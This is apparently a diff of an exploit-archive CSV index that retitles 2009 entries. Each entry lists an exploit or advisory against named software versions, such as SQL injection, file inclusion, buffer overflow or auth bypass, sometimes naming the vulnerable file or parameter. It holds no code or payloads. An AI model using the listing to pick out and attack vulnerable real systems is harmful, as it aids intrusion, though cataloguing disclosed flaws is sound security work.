Local File Inclusion Vulnerability",2009-04-27,OoN_Boy,php,webapps,0 8540,platforms/windows/local/8540.c,"SDP Downloader 2.3.0 (.ASX) Local Buffer Overflow Exploit (SEH) #2",2009-04-27,SimO-s0fT,windows,local,0 @@ -8050,7 +8050,7 @@ id,file,description,date,author,platform,type,port 8542,platforms/windows/dos/8542.php,"Icewarp Merak Mail Server 9.4.1 Base64FileEncode() BOF PoC",2009-04-27,Nine:Situations:Group,windows,dos,0 8543,platforms/php/webapps/8543.php,"LightBlog <= 9.9.2 (register.php) Remote Code Execution Exploit",2009-04-27,EgiX,php,webapps,0 8544,platforms/linux/dos/8544.pl,"iodined <= 0.4.2-2 (forged DNS packet) Denial of Service Exploit",2009-04-27,"Albert Sellares",linux,dos,0 -8545,platforms/php/webapps/8545.txt,"DEW-NEWphpLinks 2.0 (LFI/XSS) Multiple Remote Vulnerabilities",2009-04-27,d3v1l,php,webapps,0 +8545,platforms/php/webapps/8545.txt,"dew-newphplinks 2.0 (lfi/xss) Multiple Vulnerabilities",2009-04-27,d3v1l,php,webapps,0 8546,platforms/php/webapps/8546.txt,"Thickbox Gallery 2 - (index.php ln) Local File Inclusion Vulnerability",2009-04-27,SirGod,php,webapps,0 8547,platforms/php/webapps/8547.txt,"EZ-Blog Beta2 (category) Remote SQL Injection Vulnerability",2009-04-27,YEnH4ckEr,php,webapps,0 8548,platforms/php/webapps/8548.txt,"ECShop 2.5.0 (order_sn) Remote SQL Injection Vulnerability",2009-04-27,Securitylab.ir,php,webapps,0 @@ -8080,7 +8080,7 @@ id,file,description,date,author,platform,type,port 8572,platforms/linux/local/8572.c,"Linux Kernel 2.6 UDEV < 141 Local Privilege Escalation Exploit",2009-04-30,"Jon Oberheide",linux,local,0 8573,platforms/windows/dos/8573.html,"Google Chrome 1.0.154.53 (Null Pointer) Remote Crash Exploit",2009-04-30,"Aditya K Sood",windows,dos,0 8576,platforms/php/webapps/8576.pl,"Leap CMS 0.1.4 (searchterm) Blind SQL Injection Exploit",2009-04-30,YEnH4ckEr,php,webapps,0 -8577,platforms/php/webapps/8577.txt,"Leap CMS 0.1.4 (SQL/XSS/SU) Multiple Remote Vulnerabilities",2009-04-30,YEnH4ckEr,php,webapps,0 +8577,platforms/php/webapps/8577.txt,"leap cms 0.1.4 (sql/xss/su) Multiple Vulnerabilities",2009-04-30,YEnH4ckEr,php,webapps,0 8578,platforms/windows/dos/8578.pl,"Mercury Audio Player 1.21 (.M3U File) Local Stack Overflow PoC",2009-04-30,SirGod,windows,dos,0 8579,platforms/windows/remote/8579.html,"BaoFeng ActiveX OnBeforeVideoDownload() Remote BOF Exploit",2009-04-30,MITBOY,windows,remote,0 8580,platforms/windows/local/8580.py,"Mercury Audio Player 1.21 (.b4s) Local Stack Overflow Exploit",2009-04-30,His0k4,windows,local,0 @@ -8111,18 +8111,18 @@ id,file,description,date,author,platform,type,port 8605,platforms/php/webapps/8605.txt,"Million Dollar Text Links 1.0 Arbitrary Auth Bypass Vulnerability",2009-05-04,"ThE g0bL!N",php,webapps,0 8606,platforms/windows/dos/8606.py,"Quick 'n Easy Mail Server 3.3 (Demo) Remote Denial of Service PoC",2009-05-04,shinnai,windows,dos,0 8607,platforms/windows/dos/8607.pl,"Bmxplay 0.4.4b (.BMX File) Local Buffer Overflow PoC",2009-05-04,SirGod,windows,dos,0 -8608,platforms/php/webapps/8608.txt,"ProjectCMS 1.1b Multiple Remote Vulnerabilities",2009-05-04,YEnH4ckEr,php,webapps,0 +8608,platforms/php/webapps/8608.txt,"projectcms 1.1b Multiple Vulnerabilities",2009-05-04,YEnH4ckEr,php,webapps,0 8609,platforms/php/webapps/8609.pl,"Uguestbook 1.0b (guestbook.mdb) Arbitrary Database Disclosure Exploit",2009-05-04,Cyber-Zone,php,webapps,0 -8610,platforms/asp/webapps/8610.pl,"Ublog access version Arbitrary Database Disclosure Exploit",2009-05-04,Cyber-Zone,asp,webapps,0 +8610,platforms/asp/webapps/8610.pl,"Ublog access version - Arbitrary Database Disclosure Exploit",2009-05-04,Cyber-Zone,asp,webapps,0 8611,platforms/windows/dos/8611.pl,"32bit FTP (09.04.24) Banner Remote Buffer Overflow PoC",2009-05-05,"Load 99%",windows,dos,0 8612,platforms/windows/local/8612.pl,"Grabit <= 1.7.2 Beta 3 (.nzb) Local Buffer Overflow Exploit (SEH)",2009-05-05,"Gaurav Baruah",windows,local,0 8613,platforms/windows/remote/8613.py,"32bit FTP (09.04.24) (CWD response) Remote Buffer Overflow Exploit",2009-05-05,His0k4,windows,remote,0 8614,platforms/windows/remote/8614.py,"32bit FTP (09.04.24) (Banner) Remote Buffer Overflow Exploit",2009-05-05,His0k4,windows,remote,0 -8615,platforms/php/webapps/8615.txt,"TemaTres 1.0.3 (Auth Bypass/SQL/XSS) Multiple Remote Vulnerabilities",2009-05-05,YEnH4ckEr,php,webapps,0 +8615,platforms/php/webapps/8615.txt,"tematres 1.0.3 (auth bypass/sql/xss) Multiple Vulnerabilities",2009-05-05,YEnH4ckEr,php,webapps,0 8616,platforms/php/webapps/8616.pl,"TemaTres 1.0.3 Remote Blind SQL Injection Exploit",2009-05-05,YEnH4ckEr,php,webapps,0 8617,platforms/windows/dos/8617.pl,"Sorinara Streaming Audio Player 0.9 (.m3u) Local Stack Overflow PoC",2009-05-05,Cyber-Zone,windows,dos,0 8618,platforms/php/webapps/8618.txt,"LinkBase 2.0 Remote Cookie Grabber Vulnerability",2009-05-05,SirGod,php,webapps,0 -8619,platforms/php/webapps/8619.txt,"Joomla Almond Classifieds 5.6.2 Blind SQL Injection Vuln",2009-05-05,InjEctOr5,php,webapps,0 +8619,platforms/php/webapps/8619.txt,"Joomla Almond Classifieds 5.6.2 - Blind SQL Injection Vuln",2009-05-05,InjEctOr5,php,webapps,0 8620,platforms/windows/local/8620.pl,"Sorinara Streaming Audio Player 0.9 (.m3u) Local Stack Overflow Exploit",2009-05-05,Stack,windows,local,0 8621,platforms/windows/remote/8621.py,"32bit FTP (09.04.24) (CWD Response) Universal Seh Overwrite Exploit",2009-05-05,His0k4,windows,remote,0 8622,platforms/php/webapps/8622.pl,"webSPELL <= 4.2.0e (page) Remote Blind SQL Injection Exploit",2009-05-07,DNX,php,webapps,0 @@ -8161,7 +8161,7 @@ id,file,description,date,author,platform,type,port 8655,platforms/php/webapps/8655.pl,"microTopic 1 - (Rating) Remote Blind SQL Injection Exploit",2009-05-11,YEnH4ckEr,php,webapps,0 8656,platforms/windows/local/8656.py,"MPLAB IDE 8.30 (.mcp) Universal Seh Overwrite Exploit",2009-05-11,His0k4,windows,local,0 8657,platforms/windows/local/8657.txt,"EasyPHP 3.0 Arbitrary Modify Configuration File Vulnerability",2009-05-11,Zigma,windows,local,0 -8658,platforms/php/webapps/8658.txt,"Php Recommend <= 1.3 (AB/RFI/CI) Multiple Remote Vulnerabilities",2009-05-11,scriptjunkie,php,webapps,0 +8658,platforms/php/webapps/8658.txt,"php recommend <= 1.3 (ab/rfi/ci) Multiple Vulnerabilities",2009-05-11,scriptjunkie,php,webapps,0 8659,platforms/php/webapps/8659.php,"Bitweaver <= 2.6 saveFeed() Remote Code Execution Exploit",2009-05-12,Nine:Situations:Group,php,webapps,0 8660,platforms/windows/local/8660.pl,"CastRipper 2.50.70 (.m3u) Local Buffer Overflow Exploit",2009-05-12,[0]x80->[H]4x²0r,windows,local,0 8661,platforms/windows/local/8661.pl,"CastRipper 2.50.70 (.m3u) Universal Stack Overflow Exploit",2009-05-12,Stack,windows,local,0 @@ -8169,7 +8169,7 @@ id,file,description,date,author,platform,type,port 8663,platforms/windows/local/8663.pl,"CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit",2009-05-12,zAx,windows,local,0 8664,platforms/php/webapps/8664.pl,"BIGACE CMS 2.5 (username) Remote SQL Injection Exploit",2009-05-12,YEnH4ckEr,php,webapps,0 8665,platforms/windows/dos/8665.html,"Java SE Runtime Environment - JRE 6 Update 13 Multiple Vulnerabilities",2009-05-13,shinnai,windows,dos,0 -8666,platforms/windows/remote/8666.txt,"Zervit Webserver 0.4 Directory Traversal / Memory Corruption PoC",2009-05-13,"e.wiZz! & shinnai",windows,remote,0 +8666,platforms/windows/remote/8666.txt,"zervit webserver 0.4 - Directory Traversal / memory corruption poc",2009-05-13,"e.wiZz! & shinnai",windows,remote,0 8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 (script) Local File Disclosure Vulnerability",2009-05-13,ahmadbady,php,webapps,0 8668,platforms/php/webapps/8668.txt,"Password Protector SD 1.3.1 Insecure Cookie Handling Vulnerability",2009-05-13,Mr.tro0oqy,php,webapps,0 8669,platforms/multiple/dos/8669.c,"ipsec-tools racoon frag-isakmp Denial of Service PoC",2009-05-13,mu-b,multiple,dos,0 @@ -8192,7 +8192,7 @@ id,file,description,date,author,platform,type,port 8686,platforms/php/webapps/8686.txt,"MRCGIGUY Message Box 1.0 Insecure Cookie Handling Vuln",2009-05-14,TiGeR-Dz,php,webapps,0 8687,platforms/php/webapps/8687.txt,"MRCGIGUY The Ticket System 2.0 Insecure Cookie Handling Vuln",2009-05-14,TiGeR-Dz,php,webapps,0 8688,platforms/php/webapps/8688.txt,"MRCGIGUY Ultimate Profit Portal 1.0.1 Insecure Cookie Handling Vuln",2009-05-14,TiGeR-Dz,php,webapps,0 -8689,platforms/php/webapps/8689.txt,"2daybiz Business Community Script Multiple Remote Vulnerabilities",2009-05-14,TiGeR-Dz,php,webapps,0 +8689,platforms/php/webapps/8689.txt,"2daybiz business community script Multiple Vulnerabilities",2009-05-14,TiGeR-Dz,php,webapps,0 8690,platforms/php/webapps/8690.txt,"Easy Scripts Answer and Question Script Multiple Vulnerabilities",2009-05-14,InjEctOr5,php,webapps,0 8691,platforms/php/webapps/8691.txt,"2daybiz Template Monster Clone (edituser.php) Change Pass Exploit",2009-05-14,TiGeR-Dz,php,webapps,0 8692,platforms/php/webapps/8692.txt,"MRCGIGUY SimpLISTic SQL 2.0.0 Insecure Cookie Handling Vuln",2009-05-14,"ThE g0bL!N",php,webapps,0 @@ -8208,18 +8208,18 @@ id,file,description,date,author,platform,type,port 8704,platforms/windows/remote/8704.txt,"Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Vulnerability",2009-05-15,Kingcope,windows,remote,0 8705,platforms/asp/webapps/8705.txt,"DMXReady Registration Manager 1.1 Database Disclosure Vulnerability",2009-05-15,S4S-T3rr0r!sT,asp,webapps,0 8706,platforms/php/webapps/8706.pl,"PHPenpals <= 1.1 (mail.php ID) Remote SQL Injection Exploit",2009-05-15,Br0ly,php,webapps,0 -8707,platforms/php/webapps/8707.txt,"my-colex 1.4.2 (AB/XSS/SQL) Multiple Remote Vulnerabilities",2009-05-15,YEnH4ckEr,php,webapps,0 -8708,platforms/php/webapps/8708.txt,"my-Gesuad 0.9.14 (AB/SQL/XSS) Multiple Remote Vulnerabilities",2009-05-15,YEnH4ckEr,php,webapps,0 +8707,platforms/php/webapps/8707.txt,"my-colex 1.4.2 (ab/xss/sql) Multiple Vulnerabilities",2009-05-15,YEnH4ckEr,php,webapps,0 +8708,platforms/php/webapps/8708.txt,"my-gesuad 0.9.14 (ab/sql/xss) Multiple Vulnerabilities",2009-05-15,YEnH4ckEr,php,webapps,0 8709,platforms/php/webapps/8709.txt,"Pc4Uploader 9.0 Remote Blind SQL Injection Vulnerability",2009-05-18,Qabandi,php,webapps,0 8710,platforms/php/webapps/8710.txt,"PHP Dir Submit (Auth Bypass) SQL Injection Vulnerability",2009-05-18,Snakespc,php,webapps,0 8711,platforms/php/webapps/8711.txt,"Online Rental Property Script <= 5.0 (pid) SQL Injection Vulnerability",2009-05-18,"UnderTaker HaCkEr",php,webapps,0 8712,platforms/windows/dos/8712.txt,"httpdx <= 0.5b Multiple Remote Denial of Service Vulnerabilities",2009-05-18,sico2819,windows,dos,0 -8713,platforms/php/webapps/8713.txt,"Coppermine Photo Gallery <= 1.4.22 Multiple Remote Vulnerabilities",2009-05-18,girex,php,webapps,0 +8713,platforms/php/webapps/8713.txt,"coppermine photo gallery <= 1.4.22 Multiple Vulnerabilities",2009-05-18,girex,php,webapps,0 8714,platforms/php/webapps/8714.txt,"Flyspeck CMS 6.8 Remote LFI / Change Add Admin Exploit",2009-05-18,ahmadbady,php,webapps,0 8715,platforms/php/webapps/8715.txt,"Pluck 4.6.2 (langpref) Local File Inclusion Vulnerabilities",2009-05-18,ahmadbady,php,webapps,0 8716,platforms/windows/remote/8716.py,"httpdx <= 0.5b FTP Server (USER) Remote BOF Exploit (SEH)",2009-05-18,His0k4,windows,remote,21 8717,platforms/php/webapps/8717.txt,"ClanWeb 1.4.2 Remote Change Password / Add Admin Exploit",2009-05-18,ahmadbady,php,webapps,0 -8718,platforms/php/webapps/8718.txt,"DOURAN Portal <= 3.9.0.23 Multiple Remote Vulnerabilities",2009-05-18,Abysssec,php,webapps,0 +8718,platforms/php/webapps/8718.txt,"douran portal <= 3.9.0.23 Multiple Vulnerabilities",2009-05-18,Abysssec,php,webapps,0 8719,platforms/asp/webapps/8719.py,"Dana Portal Remote Change Admin Password Exploit",2009-05-18,Abysssec,asp,webapps,0 8720,platforms/multiple/dos/8720.c,"OpenSSL <= 0.9.8k, 1.0.0-beta2 DTLS Remote Memory Exhaustion DoS",2009-05-18,"Jon Oberheide",multiple,dos,0 8721,platforms/windows/dos/8721.pl,"Zervit Webserver 0.04 (GET Request) Remote Buffer Overflow PoC",2009-05-18,Stack,windows,dos,0 @@ -8236,15 +8236,15 @@ id,file,description,date,author,platform,type,port 8734,platforms/asp/webapps/8734.txt,"Namad (IMenAfzar) 2.0.0.0 Remote File Disclosure Vulnerability",2009-05-19,Securitylab.ir,asp,webapps,0 8735,platforms/php/webapps/8735.txt,"PAD Site Scripts 3.6 Insecure Cookie Handling Vulnerability",2009-05-19,Mr.tro0oqy,php,webapps,0 8736,platforms/php/webapps/8736.pl,"Coppermine Photo Gallery <= 1.4.22 Remote Exploit",2009-05-19,girex,php,webapps,0 -8737,platforms/php/webapps/8737.txt,"VidShare Pro (SQL/XSS) Multiple Remote Vulnerabilities",2009-05-19,Snakespc,php,webapps,0 +8737,platforms/php/webapps/8737.txt,"vidshare pro (sql/xss) Multiple Vulnerabilities",2009-05-19,Snakespc,php,webapps,0 8738,platforms/php/webapps/8738.txt,"Dog Pedigree Online Database 1.0.1b Multiple SQL Injection Vulns",2009-05-19,YEnH4ckEr,php,webapps,0 8739,platforms/php/webapps/8739.txt,"Dog Pedigree Online Database 1.0.1b Insecure Cookie Handling Vuln",2009-05-19,YEnH4ckEr,php,webapps,0 8740,platforms/php/webapps/8740.pl,"Dog Pedigree Online Database 1.0.1b Blind SQL Injection Exploit",2009-05-19,YEnH4ckEr,php,webapps,0 8741,platforms/php/webapps/8741.txt,"DM FileManager 3.9.2 (Auth Bypass) SQL Injection Vulnerability",2009-05-19,Snakespc,php,webapps,0 8742,platforms/windows/remote/8742.txt,"KingSoft Web Shield <= 1.1.0.62 XSS/Code Execution Vulnerability",2009-05-19,inking,windows,remote,0 8743,platforms/php/webapps/8743.txt,"Joomla Casino 0.3.1 Multiple SQL Injection Exploits",2009-05-20,ByALBAYX,php,webapps,0 -8744,platforms/php/webapps/8744.txt,"exJune Officer Message System 1 - Multiple Remote Vulnerabilities",2009-05-20,ByALBAYX,php,webapps,0 -8745,platforms/php/webapps/8745.txt,"Catviz 0.4.0b1 (LFI/XSS) Multiple Remote Vulnerabilities",2009-05-20,ByALBAYX,php,webapps,0 +8744,platforms/php/webapps/8744.txt,"exjune officer message system 1 - Multiple Vulnerabilities",2009-05-20,ByALBAYX,php,webapps,0 +8745,platforms/php/webapps/8745.txt,"catviz 0.4.0b1 (lfi/xss) Multiple Vulnerabilities",2009-05-20,ByALBAYX,php,webapps,0 8746,platforms/php/webapps/8746.txt,"NC GBook 1.0 Remote Command injection Exploit",2009-05-20,"ThE g0bL!N",php,webapps,0 8747,platforms/php/webapps/8747.txt,"NC LinkList 1.3.1 Remote Command Injection Exploit",2009-05-20,"ThE g0bL!N",php,webapps,0 8748,platforms/php/webapps/8748.txt,"Realty Web-Base 1.0 (list_list.php id) SQL Injection Vulnerability",2009-05-20,"ThE g0bL!N",php,webapps,0 @@ -8255,7 +8255,7 @@ id,file,description,date,author,platform,type,port 8753,platforms/osx/remote/8753.txt,"Mac OS X Java applet Remote Deserialization Remote PoC (updated)",2009-05-20,"Landon Fuller",osx,remote,0 8754,platforms/windows/remote/8754.patch,"Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch)",2009-05-21,"Ron Bowes/Andrew Orr",windows,remote,0 8755,platforms/php/webapps/8755.txt,"VICIDIAL 2.0.5-173 (Auth Bypass) SQL Injection Vulnerability",2009-05-21,Striker7,php,webapps,0 -8756,platforms/asp/webapps/8756.txt,"ASP Inline Corporate Calendar (SQL/XSS) Multiple Remote Vulnerabilities",2009-05-21,Bl@ckbe@rD,asp,webapps,0 +8756,platforms/asp/webapps/8756.txt,"asp inline corporate calendar (sql/xss) Multiple Vulnerabilities",2009-05-21,Bl@ckbe@rD,asp,webapps,0 8757,platforms/windows/remote/8757.html,"BaoFeng (config.dll) ActiveX Remote Code Execution Exploit",2009-05-21,etirah,windows,remote,0 8758,platforms/windows/remote/8758.html,"ChinaGames (CGAgent.dll) ActiveX Remote Code Execution Exploit",2009-05-21,etirah,windows,remote,0 8759,platforms/php/webapps/8759.txt,"Flash Quiz Beta 2 Multiple Remote SQL Injection Vulnerabilities",2009-05-21,YEnH4ckEr,php,webapps,0 @@ -8273,9 +8273,9 @@ id,file,description,date,author,platform,type,port 8773,platforms/php/webapps/8773.txt,"ZaoCMS (PhpCommander) Arbitary Remote File Upload Vulnerability",2009-05-22,Qabandi,php,webapps,0 8774,platforms/php/webapps/8774.htm,"Mole Group Sky Hunter/Bus Ticket Scripts Change Admin Pass Exploit",2009-05-22,G4N0K,php,webapps,0 8775,platforms/php/webapps/8775.txt,"Mole Group Restaurant Directory Script 3.0 Change Admin Pass Vuln",2009-05-22,G4N0K,php,webapps,0 -8776,platforms/php/webapps/8776.txt,"PhotoVideoTube 1.11 Multiple Remote Vulnerabilities",2009-05-22,Hakxer,php,webapps,0 +8776,platforms/php/webapps/8776.txt,"photovideotube 1.11 Multiple Vulnerabilities",2009-05-22,Hakxer,php,webapps,0 8777,platforms/windows/dos/8777.txt,"Soulseek 157 NS */ 156.* Remote Distributed Search Code Execution",2009-05-26,"laurent gaffiĂ© ",windows,dos,0 -8778,platforms/php/webapps/8778.txt,"MiniTwitter 0.3-Beta (SQL/XSS) Multiple Remote Vulnerabilities",2009-05-26,YEnH4ckEr,php,webapps,0 +8778,platforms/php/webapps/8778.txt,"minitwitter 0.3-beta (sql/xss) Multiple Vulnerabilities",2009-05-26,YEnH4ckEr,php,webapps,0 8779,platforms/php/webapps/8779.txt,"Joomla Boy Scout Advancement 0.3 (id) SQL Injection Exploit",2009-05-26,YEnH4ckEr,php,webapps,0 8780,platforms/windows/local/8780.php,"COWON America jetCast 2.0.4.1109 (.mp3) Local Overflow Exploit",2009-05-26,Nine:Situations:Group,windows,local,0 8781,platforms/php/webapps/8781.txt,"Dokuwiki 2009-02-14 Local File Inclusion Vulnerability",2009-05-26,girex,php,webapps,0 @@ -8294,7 +8294,7 @@ id,file,description,date,author,platform,type,port 8794,platforms/multiple/dos/8794.htm,"Mozilla Firefox (unclamped loop) Denial of Service Exploit",2009-05-26,"Thierry Zoller",multiple,dos,0 8795,platforms/php/webapps/8795.htm,"Ultimate Media Script 2.0 Remote Change Content Vulnerabilities",2009-05-26,"ThE g0bL!N",php,webapps,0 8796,platforms/php/webapps/8796.htm,"Gallarific (user.php) Arbirary Change Admin Information Exploit",2009-05-26,TiGeR-Dz,php,webapps,0 -8797,platforms/php/webapps/8797.txt,"RoomPHPlanning 1.6 Multiple Remote Vulnerabilities",2009-05-26,"ThE g0bL!N",php,webapps,0 +8797,platforms/php/webapps/8797.txt,"roomphplanning 1.6 Multiple Vulnerabilities",2009-05-26,"ThE g0bL!N",php,webapps,0 8798,platforms/windows/dos/8798.rb,"Safari RSS feed:// Buffer Overflow via libxml2 Exploit PoC",2009-05-26,"Kevin Finisterre",windows,dos,0 8799,platforms/windows/local/8799.txt,"PHP <= 5.2.9 Local Safemod Bypass Exploit (win32)",2009-05-26,Abysssec,windows,local,0 8801,platforms/php/webapps/8801.txt,"Joomla Component com_rsgallery2 1.14.x/2.x Remote Backdoor Vuln",2009-05-26,"Jan Van Niekerk",php,webapps,0 @@ -8310,13 +8310,13 @@ id,file,description,date,author,platform,type,port 8811,platforms/php/webapps/8811.txt,"Joomla Component Com_Agora 3.0.0 RC1 Remote File Upload Vulnerability",2009-05-26,ByALBAYX,php,webapps,0 8812,platforms/php/webapps/8812.txt,"Dokuwiki 2009-02-14 Remote/Temporary File Inclusion exploit",2009-05-26,Nine:Situations:Group,php,webapps,0 8813,platforms/php/webapps/8813.txt,"Million Dollar Text Links 1.x Insecure Cookie Handling Vulnerability",2009-05-27,HxH,php,webapps,0 -8814,platforms/php/webapps/8814.txt,"Joomla Component AgoraGroup 0.3.5.3 Blind SQL Injection Vulnerability",2009-05-27,"Chip D3 Bi0s",php,webapps,0 -8815,platforms/php/webapps/8815.txt,"Easy Px 41 CMS v09.00.00B1 (fiche) Local File Inclusion Vulnerability",2009-05-27,"ThE g0bL!N",php,webapps,0 +8814,platforms/php/webapps/8814.txt,"Joomla Component AgoraGroup 0.3.5.3 - Blind SQL Injection Vulnerability",2009-05-27,"Chip D3 Bi0s",php,webapps,0 +8815,platforms/php/webapps/8815.txt,"Easy Px 41 CMS 09.00.00B1 - (fiche) Local File Inclusion Vulnerability",2009-05-27,"ThE g0bL!N",php,webapps,0 8816,platforms/php/webapps/8816.txt,"SiteX <= 0.7.4.418 (THEME_FOLDER) Local File Inclusion Vulnerabilities",2009-05-27,ahmadbady,php,webapps,0 8817,platforms/php/webapps/8817.txt,"Evernew Free Joke Script 1.2 (cat_id) Remote SQL Injection Vulnerability",2009-05-27,taRentReXx,php,webapps,0 8818,platforms/php/webapps/8818.txt,"AdPeeps 8.5d1 XSS and HTML Injection Vulnerabilities",2009-05-27,intern0t,php,webapps,0 -8819,platforms/php/webapps/8819.txt,"Small Pirate v-2.1 (XSS/SQL) Multiple Remote Vulnerabilities",2009-05-29,YEnH4ckEr,php,webapps,0 -8820,platforms/php/webapps/8820.txt,"AMember 3.1.7 (XSS/SQL/HI) Multiple Remote Vulnerabilities",2009-05-29,intern0t,php,webapps,0 +8819,platforms/php/webapps/8819.txt,"small pirate v-2.1 (xss/sql) Multiple Vulnerabilities",2009-05-29,YEnH4ckEr,php,webapps,0 +8820,platforms/php/webapps/8820.txt,"amember 3.1.7 (xss/sql/hi) Multiple Vulnerabilities",2009-05-29,intern0t,php,webapps,0 8821,platforms/php/webapps/8821.txt,"Joomla Component JVideo 0.3.x SQL Injection Vulnerability",2009-05-29,"Chip D3 Bi0s",php,webapps,0 8822,platforms/multiple/dos/8822.txt,"Mozilla Firefox 3.0.10 (KEYGEN) Remote Denial of Service Exploit",2009-05-29,"Thierry Zoller",multiple,dos,0 8823,platforms/php/webapps/8823.txt,"Webboard <= 2.90 beta - Remote File Disclosure Vulnerability",2009-05-29,MrDoug,php,webapps,0 @@ -8334,10 +8334,10 @@ id,file,description,date,author,platform,type,port 8835,platforms/windows/remote/8835.html,"Roxio CinePlayer 3.2 (IAManager.dll) Remote BOF Exploit (heap spray)",2009-06-01,His0k4,windows,remote,0 8836,platforms/php/webapps/8836.txt,"OCS Inventory NG 1.02 Multiple SQL Injection Vulnerabilities",2009-06-01,"Nico Leidecker",php,webapps,0 8837,platforms/windows/dos/8837.txt,"AIMP 2.51 build 330 - (ID3v1/ID3v2 Tag) Remote Stack BOF PoC (SEH)",2009-06-01,LiquidWorm,windows,dos,0 -8838,platforms/php/webapps/8838.txt,"eliteCMS 1.01 (SQL/XSS) Multiple Remote Vulnerabilities",2009-06-01,xeno_hive,php,webapps,0 +8838,platforms/php/webapps/8838.txt,"elitecms 1.01 (sql/xss) Multiple Vulnerabilities",2009-06-01,xeno_hive,php,webapps,0 8839,platforms/php/webapps/8839.txt,"Open-school 1.0 (id) Remote SQL Injection Vulnerability",2009-06-01,OzX,php,webapps,0 8840,platforms/php/webapps/8840.txt,"Escon SupportPortal Pro 3.0 (tid) Blind SQL Injection Vulnerability",2009-06-01,OzX,php,webapps,0 -8841,platforms/php/webapps/8841.txt,"Unclassified NewsBoard 1.6.4 Multiple Remote Vulnerabilities",2009-06-01,girex,php,webapps,0 +8841,platforms/php/webapps/8841.txt,"unclassified newsboard 1.6.4 Multiple Vulnerabilities",2009-06-01,girex,php,webapps,0 8842,platforms/multiple/dos/8842.pl,"Apache mod_dav / svn Remote Denial of Service Exploit",2009-06-01,Kingcope,multiple,dos,0 8843,platforms/php/webapps/8843.pl,"Online Grades & Attendance 3.2.6 Credentials Changer SQL Exploit",2009-06-01,YEnH4ckEr,php,webapps,0 8844,platforms/php/webapps/8844.txt,"Online Grades & Attendance 3.2.6 Multiple SQL Injection Vulnerabilities",2009-06-01,YEnH4ckEr,php,webapps,0 @@ -8349,13 +8349,13 @@ id,file,description,date,author,platform,type,port 8851,platforms/php/webapps/8851.txt,"AdaptBB 1.0 (forumspath) Remote File Inclusion Vulnerability",2009-06-01,"Mehmet Ince",php,webapps,0 8852,platforms/php/webapps/8852.txt,"ASP Football Pool 2.3 Remote Database Disclosure Vulnerability",2009-06-01,ByALBAYX,php,webapps,0 8853,platforms/php/webapps/8853.txt,"Online Grades & Attendance 3.2.6 Multiple Local File Inclusion Vulns",2009-06-02,YEnH4ckEr,php,webapps,0 -8854,platforms/php/webapps/8854.pl,"Online Grades & Attendance 3.2.6 Blind SQL Injection Exploit",2009-06-02,YEnH4ckEr,php,webapps,0 +8854,platforms/php/webapps/8854.pl,"Online Grades & Attendance 3.2.6 - Blind SQL Injection Exploit",2009-06-02,YEnH4ckEr,php,webapps,0 8855,platforms/php/webapps/8855.txt,"AlstraSoft Article Manager Pro Remote Shell Upload Vulnerability",2009-06-02,ZoRLu,php,webapps,0 -8856,platforms/php/webapps/8856.txt,"Flashlight Free Edition (LFI/SQL) Multiple Remote Vulnerabilities",2009-06-02,K4m1k451,php,webapps,0 +8856,platforms/php/webapps/8856.txt,"flashlight free edition (lfi/sql) Multiple Vulnerabilities",2009-06-02,K4m1k451,php,webapps,0 8857,platforms/php/webapps/8857.txt,"WebCal (webCal3_detail.asp event_id) SQL Injection Vulnerability",2009-06-02,Bl@ckbe@rD,php,webapps,0 -8858,platforms/php/webapps/8858.txt,"PropertyMax Pro FREE (SQL/XSS) Multiple Remote Vulnerabilities",2009-06-02,SirGod,php,webapps,0 +8858,platforms/php/webapps/8858.txt,"propertymax pro free (sql/xss) Multiple Vulnerabilities",2009-06-02,SirGod,php,webapps,0 8859,platforms/asp/webapps/8859.txt,"WebEyes Guest Book v.3 (yorum.asp mesajid) SQL Injection Vulnerability",2009-06-02,Bl@ckbe@rD,asp,webapps,0 -8860,platforms/php/webapps/8860.txt,"Podcast Generator <= 1.2 GLOBALS[] Multiple Remote Vulnerabilities",2009-06-02,StAkeR,php,webapps,0 +8860,platforms/php/webapps/8860.txt,"podcast generator <= 1.2 globals[] Multiple Vulnerabilities",2009-06-02,StAkeR,php,webapps,0 8861,platforms/osx/remote/8861.rb,"Apple iTunes 8.1.1 (ITMS) Multiple Protocol Handler BOF Exploit (meta)",2009-06-03,"Will Drewry",osx,remote,0 8862,platforms/windows/dos/8862.txt,"Apple QuickTime Image Description Atom Sign Extension PoC",2009-06-03,webDEViL,windows,dos,0 8863,platforms/windows/local/8863.c,"Atomix Virtual Dj Pro 6.0 Stack Buffer Overflow PoC (SEH)",2009-06-03,"fl0 fl0w",windows,local,0 @@ -8375,7 +8375,7 @@ id,file,description,date,author,platform,type,port 8877,platforms/php/webapps/8877.txt,"Host Directory PRO 2.1.0 Remote Database Backup Vulnerability",2009-06-04,ZoRLu,php,webapps,0 8878,platforms/php/webapps/8878.txt,"Web Directory PRO Remote Database Backup Vulnerability",2009-06-04,TiGeR-Dz,php,webapps,0 8879,platforms/php/webapps/8879.htm,"Host Directory PRO 2.1.0 Remote Change Admin Password Exploit",2009-06-04,TiGeR-Dz,php,webapps,0 -8880,platforms/linux/remote/8880.txt,"Kloxo 5.75 (24 Issues) Multiple Remote Vulnerabilities",2009-06-04,n/a,linux,remote,0 +8880,platforms/linux/remote/8880.txt,"kloxo 5.75 (24 issues) Multiple Vulnerabilities",2009-06-04,n/a,linux,remote,0 8881,platforms/windows/local/8881.php,"PeaZIP <= 2.6.1 Compressed Filename Command Injection Exploit",2009-06-05,Nine:Situations:Group,windows,local,0 8882,platforms/php/webapps/8882.txt,"Pixelactivo 3.0 (idx) Remote SQL Injection Vulnerability",2009-06-05,Snakespc,php,webapps,0 8883,platforms/php/webapps/8883.txt,"Pixelactivo 3.0 (Auth Bypass) Remote SQL Injection Vulnerability",2009-06-05,"ThE g0bL!N",php,webapps,0 @@ -8394,10 +8394,10 @@ id,file,description,date,author,platform,type,port 8898,platforms/php/webapps/8898.txt,"Joomla Component MooFAQ (com_moofaq) LFI Vulnerability",2009-06-08,"Chip D3 Bi0s",php,webapps,0 8899,platforms/windows/dos/8899.txt,"SAP GUI 6.4 ActiveX (Accept) Remote Buffer Overflow PoC",2009-06-08,DSecRG,windows,dos,0 8900,platforms/php/webapps/8900.txt,"Frontis 3.9.01.24 (source_class) Remote SQL Injection Vulnerability",2009-06-08,Snakespc,php,webapps,0 -8901,platforms/php/webapps/8901.txt,"Virtue News (SQL/XSS) Multiple Remote Vulnerabilities",2009-06-08,Snakespc,php,webapps,0 